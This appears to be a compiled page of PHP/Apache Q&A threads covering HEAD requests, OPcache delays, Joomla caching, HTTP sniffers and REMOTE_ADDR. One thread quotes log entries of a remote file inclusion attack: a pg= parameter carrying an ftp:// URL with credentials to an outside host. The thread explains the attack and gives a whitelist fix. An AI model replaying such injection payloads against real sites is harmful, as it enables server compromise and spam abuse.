Does Apache pass a malformed HEAD request to PHP?

Please consider the request below, taken from the Apache access log.
119.63.193.131 - - [03/Oct/2013:19:22:19 +0000] "HEAD /blah/blahblah/ HTTP/1.1" 301 - "-" "\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)\""
Does this request comply with the RFC / standard?
Would Apache pass malformed HEAD requests to PHP?
My configuration is Apache 2.2.15, mod_fcgid 2.3.7, PHP 5.3.3, Linux 2.6.32.60-40 x64, CentOS 6.4

I see nothing obviously wrong with the request in that log entry. The user agent is unusual (it contains escaped double quotes), but that doesn't make the request malformed - it's perfectly valid, and Apache would certainly pass it on to PHP.

I have built a fair few RESTful APIs with PHP and Apache and never came across such an issue. The best approach is to isolate the part you want to be doubly sure is working, which in your case is PHP and Apache. Put together a basic PHP script that dumps $_SERVER and apache_request_headers() (and maybe other superglobals); that will give you enough of a clue as to whether the request is coming through intact. Use curl's -I option as a command-line HTTP client; you can also add -v to see exactly what happens from the client's perspective.
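For example, a minimal probe script along those lines (the name probe.php is just for illustration) might look like this:

<?php
// probe.php - dump what PHP actually received from Apache/mod_fcgid
header('Content-Type: text/plain');

// Request line components as PHP sees them
var_dump($_SERVER['REQUEST_METHOD'], $_SERVER['REQUEST_URI'], $_SERVER['SERVER_PROTOCOL']);

// Full server environment
var_dump($_SERVER);

// apache_request_headers() is not available under every SAPI
// (some FastCGI builds lack it), hence the guard
if (function_exists('apache_request_headers')) {
    var_dump(apache_request_headers());
}

Then request it with curl -v http://yourhost/probe.php to see both sides of a normal GET, and with curl -I for a HEAD; since Apache discards the response body for HEAD requests, have the script log the dump (e.g. with error_log or file_put_contents) if you need to inspect what PHP saw in that case.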

Related

User creates folders in FTP from HTML

I'm facing a big problem and I can't find the cause. I have a website running on Apache on port 80, with FTP access.
Someone is creating folders over FTP using malicious commands. I analysed the Apache log and found the following strange line:
[08/Jul/2016:22:54:09 -0300] "POST /index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&action=upload&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/ HTTP/1.1" 200 18391 "http://mywebsite/index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
In my FTP the following folder was created: /public_html/Cliente
I have a piece of code that uses $_GET['pg'], see:
$pg = isset($_GET['pg']) ? $_GET['pg'] : null;
$pg = htmlspecialchars($pg, ENT_QUOTES);
I tried testing the command "pg=ftp://zkeliai..." like the hacker did, but nothing happened, which is what I expected. I'm very confused about how the hacker created a folder on my FTP.
Without knowing what $pg is being used for, it's not really possible to tell what the hacker is doing, but it looks like he sent a POST request to index.php with the parameters
?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/
The effect of your sanitisation with htmlspecialchars is to convert the one & in the string to &amp;. But when index.php processes the request, that is effectively turned back into & in the internal string (PHP assumes it was just URL-encoded), so when index.php sends its server-side request to Thumbr.php the & is present and serves to pass the extra parameters along to the FTP-hosted script.
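To illustrate why the htmlspecialchars call doesn't help here, suppose index.php uses the value roughly like this (a hypothetical reconstruction, not the actual code):

<?php
// Hypothetical reconstruction of the vulnerable pattern - not the poster's actual code.
$pg = isset($_GET['pg']) ? $_GET['pg'] : null;
$pg = htmlspecialchars($pg, ENT_QUOTES);  // only escapes & < > " ' for HTML output

// If $pg then ends up in include() (or another file/URL function), an ftp:// value
// turns this into remote file inclusion: the attacker's Thumbr.php is downloaded and
// executed on this server, where it can read $_GET['action'], $_GET['chdir'], etc.
// from the original request and create folders or upload files over FTP.
if ($pg !== '') {
    include $pg;   // fetching remote URLs needs allow_url_include=On or a similarly permissive setup
}

htmlspecialchars only makes a value safe to print inside HTML; it does nothing to make it safe to use as a file path or URL.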
We had a similar issue on our university's site. We have had over 2,200 hits in the last few days from this IP, targeting two different .php pages: showcase.php and Thumbr.php.
Here's a snippet from our log
POST /navigator/index.php page=ftp://zkeliai:zkeliai#zkeliai.lt/zkeliai/showcase.php? 80 - 177.125.20.3 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0 11154
This page was used to send spam through our SMTP server. The page= GET parameter in the URL was being loaded by our PHP page with no filtering on the value. The showcase.php page (no longer on the FTP site) was a simple HTML form with a field for a subject, a field for HTML body contents, and a text area for email recipients.
Without being sure exactly what was posted, it seems that loading the FTP-hosted page (with the embedded credentials) into PHP via the $_GET[] value managed to execute the content of that page. I'm unclear on exactly how that works, but that seems to be what happened.
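The usual defence against this kind of pg=/page= inclusion is to never feed user input to include at all, but to map it onto a fixed whitelist of local files. A minimal sketch (the page names and paths are invented for illustration):

<?php
// Map the user-supplied value onto a fixed set of local files.
$pages = array(
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
);

$pg = isset($_GET['pg']) ? $_GET['pg'] : 'home';

if (isset($pages[$pg])) {
    include $pages[$pg];
} else {
    // Unknown value: refuse rather than trying to "clean" it.
    header('HTTP/1.0 404 Not Found');
    exit;
}

On top of that, allow_url_include should stay Off (its default), which blocks include of http:// and ftp:// URLs outright.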

Mac doesn't update fast when programming PHP

I have this weird problem, and I don't know how to get rid of it.
Example: I put a var_dump('test') in my code at the top of the page. Just to edit something.
Alt-tab to chrome, cmd-R to refresh.
The var_dump('test') is not there. Cmd-R again. Still not there.
Then I wait for a minute, and refresh... And suddenly it's there.
Basically: I will always see code changes, but not immediately.
I have this problem in PhpStorm and Netbeans, so it's probably not an IDE problem.
Edit: I have also tried this in different browsers, and they all have this as well, so it's not a browser-related problem.
Has anyone had this problem before? Does anyone know a solution to this?
It's really difficult to work efficiently if I have to wait to see my edited code live...
EDIT:
I'm working on my localhost. Server setup is with MAMP.
REQUEST HEADERS:
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:nl-NL,nl;q=0.8,en-US;q=0.6,en;q=0.4
Cache-Control:no-cache
Connection:keep-alive
Cookie:projekktorplayertracking_prkusruuid=D1A39803-4DE3-4C0B-B199-6650CF0F8DE5; Akamai_AnalyticsMetrics_clientId=C355983152DF60151A0C6375798CD52E8F09B995; __atuvc=4%7C47%2C0%7C48%2C0%7C49%2C17%7C50%2C47%7C51; PHPSESSID=885c62f543097973d17820dca7b3a526; __utma=172339134.2012691863.1384502289.1387377512.1387442224.41; __utmb=172339134.1.10.1387442224; __utmc=172339134; __utmz=172339134.1384502289.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Host:local.sos
Pragma:no-cache
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
RESPONSE HEADERS:
Connection:Keep-Alive
Content-Length:681
Content-Type:text/html
Date:Thu, 19 Dec 2013 09:00:54 GMT
Keep-Alive:timeout=5, max=99
Server:Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8y DAV/2 PHP/5.5.3
X-Pad:avoid browser bug
X-Powered-By:PHP/5.5.3
EDIT:
I was messing around in MAMP's settings. My PHP version was 5.5.3, but with that version I couldn't set any PHP extensions.
When I set the PHP version to 5.2.17 (my only other option), I was able to set the cache to XCache.
So... now my page is always up to date as soon as I reload.
Thanks to anyone that replied and helped me with this!
This was the solution:
I was messing around in MAMP's settings. My PHP version was 5.5.3, but with that version I couldn't set any PHP extensions.
When I set the PHP version to 5.2.17 (my only other option), I was able to set the cache to XCache.
Then it worked.
But then I found this thread.
In your MAMP dir, go to /bin/php/php5.5.3/conf/php.ini
and comment out the OPcache lines:
[OPcache]
;zend_extension="/Applications/MAMP/bin/php/php5.5.3/lib/php/extensions/no-debug-non-zts-20121212/opcache.so"
; opcache.memory_consumption=128
; opcache.interned_strings_buffer=8
; opcache.max_accelerated_files=4000
; opcache.revalidate_freq=60
; opcache.fast_shutdown=1
; opcache.enable_cli=1
Now I'm programming in PHP 5.5.3, and my pages are updated immediately. (The opcache.revalidate_freq=60 setting also explains the original symptom: OPcache was only rechecking files for changes every 60 seconds, hence the roughly one-minute delay.)
There are three possible causes I can think of:
Your browser is caching the file. On development sites you can disable the cache (e.g. in Chrome press F12, click the gear in the bottom right, and tick the checkbox that disables the cache while the developer tools are open - keep them open while developing).
Your connection to the server is lagging; this can be caused by delayed uploads from your IDE or by the connection itself. You can test it by opening an SSH session and checking modification times after saving (e.g. repeatedly running ls -la, or watch -n 1 ls -la, in the file's directory).
Some applications add another form of caching, such as APC or OPcache. Before assuming this is the cause, it is wise to exclude the two options above first. This step requires you to analyse the headers sent by the server, as shown on the Network tab of the devtools (in Chrome); a quick server-side check is sketched below.
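If you suspect OPcache, a quick way to check whether it is active and how often it revalidates files is a small diagnostic script (just a sketch, assuming PHP 5.5+ where OPcache is bundled):

<?php
// opcache-check.php - rough diagnostic for OPcache settings
header('Content-Type: text/plain');

if (function_exists('opcache_get_status')) {
    echo "opcache.enable              = ", ini_get('opcache.enable'), "\n";
    echo "opcache.validate_timestamps = ", ini_get('opcache.validate_timestamps'), "\n";
    echo "opcache.revalidate_freq     = ", ini_get('opcache.revalidate_freq'), " seconds\n";

    $status = opcache_get_status(false);   // false: skip the per-script list
    if ($status !== false) {
        echo "cached scripts              = ",
             $status['opcache_statistics']['num_cached_scripts'], "\n";
    }
} else {
    echo "OPcache is not loaded in this SAPI.\n";
}

A revalidate_freq of 60 with validate_timestamps enabled matches the "changes appear after about a minute" symptom; for development, setting opcache.revalidate_freq=0 (or disabling OPcache entirely) avoids it.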
Not sure about NetBeans, but PhpStorm saves the file as you type (there is no need to save explicitly). HOWEVER, the auto-save debounce is OS dependent, and on a Mac the changes may be flushed to disk more slowly. I can't recall the name of the relevant setting on OS X, but a workaround is to save the file explicitly with Command+S.
I had a similar-sounding problem working locally with .php and .less files in IE and Chrome. Something was causing the CSS file to be cached (or cookied, or something) and it wouldn't display the changes made to the .less file. We fixed it by creating a PHP variable holding a timestamp and attaching it to the end of the file name in the source link. The browser treated it as a new file and always reloaded it.
I don't have the actual code to do that right now (I'm at home) but will look for it tomorrow at work.
Obviously, this isn't the same problem you're having, but I thought it might give you a new direction to research your issue.
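For reference, a minimal sketch of that cache-busting idea (a generic example of the technique described, not their actual code):

<?php
// Append the stylesheet's modification time as a query string so the
// browser sees a "new" URL whenever the file changes on disk.
$cssFile = 'css/style.css';                                 // example path
$version = file_exists($cssFile) ? filemtime($cssFile) : time();
?>
<link rel="stylesheet" href="/css/style.css?v=<?php echo $version; ?>">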

Strange behavior on Linux (php/mysql)

We're having strange behavior on our linux server. Here are some symptoms:
1) PHP using old information when processing scripts:
For example: I loaded up the site today and it ran the mobile version of our Joomla 2.5.9 template instead of the normal template. I looked through the access log and two minutes before I loaded the site up an iPhone had accessed the site. So, for some reason the PHP code ‘thought’ that my access was still the iPhone. Here’s a snip from the access log.
74.45.141.88 - - [01/Mar/2013:07:39:24 -0800] "GET / HTTP/1.1" 200 9771 "https://m.facebook.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B141 [FBAN/FBIOS;FBAV/5.5;FBBV/123337;FBDV/iPhone2,1;FBMD/iPhone;FBSN/iPhone OS;FBSV/6.1;FBSS/1; FBCR/AT&T;FBID/phone;FBLC/en_US;FBOP/0]"
...
63.224.42.234 - - [01/Mar/2013:07:43:45 -0800] "GET / HTTP/1.1" 200 9771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
2) Links on the site are sometimes being generated within Joomla differently: sometimes "ww.sitename.com" or just "sitename.com" when it should be "www.sitename.com".
3) When I make a configuration change to the site (within Joomla administration), it doesn't always take effect immediately, though it should. For instance, when I unpublish something through the user interface, it still shows as published for quite a while afterwards. When this happens I have tried restarting both Apache and MySQL, and it didn't help; I had to wait until something updated. Eventually it does update.
4) The PHP session doesn't work consistently. We have code that generates a captcha from a session variable, and it sometimes fails, rendering the captcha inoperable.
All of the above is totally inconsistent: sometimes it wigs out, other times it doesn't. Also note that the site works completely fine on dev.sitename.com. We even tried switching the Apache webserver configuration from dev.sitename.com over to sitename.com, and the problem still persists.
Thank you.
I had a similar problem with the Magento CMS; in my case the problem was the cache used by Magento. Disabling the caching functionality solved the problem.

Program for Windows which can display HTTP requests made by PHP?

Just as Firebug shows AJAX requests made by JavaScript, is there a similar tool for Windows which can show HTTP requests made through cURL from PHP while working locally on WAMP?
Thanks.
http://www.wireshark.org/ or http://www.effetech.com/sniffer/
Also see other answers
https://stackoverflow.com/questions/1437038/http-and-https-sniffer-for-windows
How to sniff http requests
Google "HTTP Analyzer", "Protocol Analyzer", "HTTP Sniffer" etc for alternatives.
Do you want the HTTP headers?
If you have curl on windows,
curl http://example.com -D -
also gives you the HTTP headers. (The '-' after '-D' tells curl to write them to stdout (works on *nix, not sure about Windows); you can replace the '-' with a filename,
eg:
curl http://example.com -D headers.txt
)
Or you can look at it from the other side of the universe, in the Apache access logs (since you are working locally). I don't have Windows here, but you might have to configure logging:
http://httpd.apache.org/docs/1.3/logs.html#accesslog
Fiddler should be able to catch cURL traffic too, and it has quite a complete interface.
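If all you need is to see the request PHP's cURL is actually sending, you can also capture it from PHP itself, without any external sniffer. A small sketch (the URL is a placeholder):

<?php
// Record the exact request headers PHP's cURL sends out.
$ch = curl_init('http://example.com/');           // placeholder URL
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);   // return the body instead of printing it
curl_setopt($ch, CURLINFO_HEADER_OUT, true);      // keep a copy of the outgoing request headers

$body = curl_exec($ch);

// The raw request headers that were sent:
echo curl_getinfo($ch, CURLINFO_HEADER_OUT);

curl_close($ch);

For a full trace of both directions, CURLOPT_VERBOSE combined with CURLOPT_STDERR pointed at a file gives output similar to curl -v.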

Is it possible that REMOTE_ADDR could be blank?

As far as I'm aware, the webserver (Apache/Nginx) provides $_SERVER['REMOTE_ADDR'] based on the claimed location of the requesting user agent. So I understand it can be lied about, but is it possible that this value could be blank? Would the network interface or webserver even accept a request without a correctly formed IP?
http://php.net/manual/en/reserved.variables.server.php
It is theoretically possible, as the matter is up to the HTTP server, or at least the corresponding PHP SAPI.
In practice, I haven't encountered such a situation, except with the CLI SAPI.
EDIT: For Apache, it would seem this is always set, as ap_add_common_vars always adds it to the table that ends up being read by the Apache module PHP SAPI (disclaimer: I have very limited knowledge of Apache internals).
If using PHP in a CGI environment, the specification in RFC 3875 seems to guarantee the existence of this variable:
4.1.8. REMOTE_ADDR
The REMOTE_ADDR variable MUST be set to the network address of the
client sending the request to the server.
Yes. I currently see values of "unknown" in my logs of Apache-behind-Nginx, for what looks like a normal request/response sequence in the logs. I believe this is possible because mod_extract_forwarded is modifying the request to reset REMOTE_ADDR based on data in the X-Forwarded-For header. So, the original REMOTE_ADDR value was likely valid, but as part of passing through our reverse proxy and Apache, REMOTE_ADDR appears invalid by the time it arrives at the application.
If you have installed Perl's libwww-perl, you can test this situation like this (changing example.com to be your own domain or application):
HEAD -H 'X-Forwarded-For: ' -sSe http://www.example.com/
HEAD -H 'X-Forwarded-For: HIMOM' -sSe http://www.example.com/
HEAD -H 'X-Forwarded-For: <iframe src=http://example.com>' -sSe http://www.example.com/
( You can also use any other tool that allows you to handcraft HTTP requests with custom request headers. )
Now, go check your access logs to see what values they logged, and check your applications to see how they handled the bad input.
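Whatever the upstream cause, the application can at least refuse to trust a missing or malformed value. A small defensive sketch:

<?php
// Treat REMOTE_ADDR as untrusted input: it may be absent (CLI), "unknown",
// or rewritten by a proxy module, so validate it before storing or displaying it.
$remote = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';

if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
    error_log('Request with missing or invalid REMOTE_ADDR: ' . var_export($remote, true));
    $remote = '0.0.0.0';   // placeholder fallback; choose whatever suits your application
}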
Well, it's reserved but writable. I've seen badly written apps that were scribbling all over the superglobals - could the script be overwriting it, e.g. with $_SERVER['REMOTE_ADDR'] = '';?
Other than that, even if the request were proxied, there should be the address of the proxy - could it be some sort of internal-rewrite module messing with it (mod_rewrite allows internal redirects, not sure if it affects this)?
It shouldn't be blank: nothing can connect to your web service without one. Whatever is connecting must have an IP address to send and receive data. Whether that IP address can be trusted is a different matter.
